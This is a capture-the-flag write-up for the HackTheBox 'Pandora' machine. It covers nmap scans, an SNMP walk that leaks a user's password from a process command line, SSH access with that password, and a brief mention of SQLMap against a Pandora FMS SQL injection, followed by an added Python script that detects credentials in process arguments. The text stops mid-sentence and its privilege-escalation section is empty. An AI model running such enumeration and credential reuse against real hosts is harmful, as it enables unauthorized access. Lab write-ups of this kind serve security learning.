Pandora 10.10.11.136

Background

Pandora is a Linux-based machine from HackTheBox. It requires patient web research, some encoding concepts, and Python skills for the privilege escalation.

Target Machine: 10.10.11.136

Attacker Machine: 10.10.14.4

Hacking Process Part 0 – Service Scanning

Nmap

1) nmap -p- -T5 --min-rate=1000 10.10.11.136 -oG fkclai.nmap
2) nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.11.136 -oN nmap-result.txt

Enumeration Strategies

No vulnerability was found in the SSH or HTTP service, so the next step was to review the web application for information leakage or misconfiguration.

Hacking Process Part 1 – Enumeration

Basic web enumeration with gobuster found a set of pages, of which the one with a submission form looked interesting. However, it did not lead to anything useful.

Thinking: check the UDP ports

nmap -sC -sV -sU --top-ports=20 pandora.htb

Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.27s latency).

PORT      STATE         SERVICE      VERSION
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open          snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 20m46s
| snmp-processes: 
|   1: 
| 
|   2: 
| 
|   3: 
| 
|_  4: 
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 20m46.36s (124636 timeticks)
|_snmp-win32-software: 
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.89 seconds

Checking the open ports one by one

SNMP Port 161

// walk the full tree with the default read-only community and save the output
snmpwalk -v 2c -c public pandora.htb > snmpwalk.result

iso.3.6.1.2.1.25.4.2.1.5.870 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"

This yields the username daniel and the password HotelBabylon23; try an SSH connection with this account.
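The leaked line above comes from HOST-RESOURCES-MIB hrSWRunParameters (OID 1.3.6.1.2.1.25.4.2.1.5.<pid>), which exposes the argument string of every running process to anyone who knows the read-only community, so a secret passed on a command line becomes readable over SNMP. The script below is an added example, not part of this writeup or of any tool it uses: it parses snmpwalk output (constructed sample lines, with the pid 870 line copied from above) and flags credential-like arguments, and the same check can be run locally against /proc. The function names, the regex set and the sample lines are my own choices.

```python
import os
import re
from typing import Iterable, List, Tuple

# Accepted spellings of hrSWRunParameters, depending on whether snmpwalk had MIBs loaded.
OID_PREFIXES = (
    "iso.3.6.1.2.1.25.4.2.1.5.",
    ".1.3.6.1.2.1.25.4.2.1.5.",
    "HOST-RESOURCES-MIB::hrSWRunParameters.",
)

# One snmpwalk output line of the form  <oid> = STRING: "<value>"
SNMP_LINE = re.compile(r'^(?P<oid>\S+)\s*=\s*STRING:\s*"(?P<val>.*)"\s*$')

# Argument shapes that usually carry a secret. Covers "-p secret" as a separate
# argument (the glued "-psecret" form is deliberately not matched to avoid
# flagging options such as -print), --password=/--token= style flags, and
# KEY=value assignments whose key ends in PASS/PASSWORD/TOKEN/SECRET/KEY.
SECRET_PATTERNS = [
    re.compile(r"(?:^|\s)-p\s+(\S+)"),
    re.compile(r"(?:^|\s)--?(?:pass(?:word)?|pwd|token|secret)[=\s]+(\S+)", re.I),
    re.compile(r"\b(?:[A-Z_]*(?:PASS(?:WORD)?|TOKEN|SECRET|KEY))=(\S+)"),
]


def find_credential_args(cmdline: str) -> List[str]:
    """Return the secret-looking values found in one process argument string."""
    found: List[str] = []
    for pat in SECRET_PATTERNS:
        for m in pat.finditer(cmdline):
            val = m.group(1).strip("'\"")   # drop shell quoting around the value
            if val and val not in found:
                found.append(val)
    return found


def parse_snmpwalk(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Extract (pid, argument string) pairs from hrSWRunParameters lines."""
    procs: List[Tuple[int, str]] = []
    for line in lines:
        m = SNMP_LINE.match(line.strip())
        if not m or not m.group("oid").startswith(OID_PREFIXES):
            continue
        pid = int(m.group("oid").rsplit(".", 1)[1])   # last OID component is the pid
        procs.append((pid, m.group("val")))
    return procs


def audit_snmpwalk(lines: Iterable[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (pid, cmdline, secrets) for every process leaking credentials via SNMP."""
    hits = []
    for pid, args in parse_snmpwalk(lines):
        secrets = find_credential_args(args)
        if secrets:
            hits.append((pid, args, secrets))
    return hits


def audit_proc() -> List[Tuple[int, str, List[str]]]:
    """Same check from inside a Linux host: read /proc/<pid>/cmdline for visible processes."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as fh:
                raw = fh.read()
        except OSError:
            continue   # process exited or is not readable
        cmdline = raw.replace(b"\0", b" ").decode(errors="replace").strip()
        secrets = find_credential_args(cmdline)
        if secrets:
            hits.append((int(entry), cmdline, secrets))
    return hits


# Constructed sample: three made-up lines plus the real pid 870 line from the walkthrough.
SAMPLE_SNMPWALK = """\
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: ""
iso.3.6.1.2.1.25.4.2.1.5.812 = STRING: "-f /etc/ssh/sshd_config"
iso.3.6.1.2.1.25.4.2.1.5.870 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.901 = STRING: "--user=backup --password=example-backup-secret"
""".splitlines()


if __name__ == "__main__":
    for pid, cmdline, secrets in audit_snmpwalk(SAMPLE_SNMPWALK):
        print(f"pid {pid}: {secrets} in {cmdline!r}")
```

Run against a saved snmpwalk result with audit_snmpwalk(open("snmpwalk.result")); on the host itself audit_proc() shows what any local user can already see with ps. The fix on the Pandora side is twofold: the cron job should read its credential from a file with restricted permissions or from the environment instead of argv, and snmpd should not expose the process table to the default community at all (a restricted view in snmpd.conf, or SNMPv3 with authentication).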

Hacking Process Part 2 – Gaining Foothold

Initial access is obtained over SSH using the credentials found in the SNMP process listing.

Unfortunately, this account cannot read user.txt.

After reviewing the network configuration, it turned out that a website is hosted internally but cannot be reached from outside.

SSH tunnelling was used to forward the internal page to the attacker machine.

CVE-2020-5844 applies to this version (v7.0NG.742_FIX_PERL2020): an SQL injection vulnerability. Using SQLMap to check the

SQLMap identified the database name (pandora), the table tsessions_php, and its relevant fields. The command was adjusted accordingly and executed again.

Hacking Process Part 3 – Privilege Escalation
